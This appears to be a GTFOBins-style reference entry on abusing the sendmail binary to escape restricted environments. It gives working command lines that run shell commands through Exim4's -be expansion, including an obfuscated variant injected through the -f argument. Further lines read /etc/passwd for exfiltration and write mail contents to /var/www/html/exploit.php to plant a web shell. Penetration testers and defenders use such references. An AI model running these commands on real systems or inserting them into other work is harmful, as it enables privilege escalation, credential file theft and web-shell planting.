sendmail differs between systems, depending on whether it is postfix, exim, or otherwise, which provides the binary.
It can be used to break out from the intended program by running non-interactive system commands.
The -be flag can be used to execute system commands, when sendmail is provided by Exim4.
sendmail -be '${run{/bin/sh -c "uname -a"}{yes}{no}}'See "PoC HTTP request / minimal PoC exploit" for more information about this exploit. This example runs uname -a.
sendmail -t -i -f 'email@address.com(tmp1' -be '${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}uname${substr{10}{1}{$tod_log}}-a$}}' 'tmp2)'It can exfiltrate files on the network.
Arbitrary files can be delivered.
sendmail -t -i -f mail@address.com -C/etc/passwd -X/dev/null < mail.txtIt writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
Arbitrary local files can be written to a new location. It is worthy of playing around with the ability to upload files/the contents of the mail being sent.
sendmail -t -i -f mail@address.com -X/var/www/html/exploit.php < mail.txt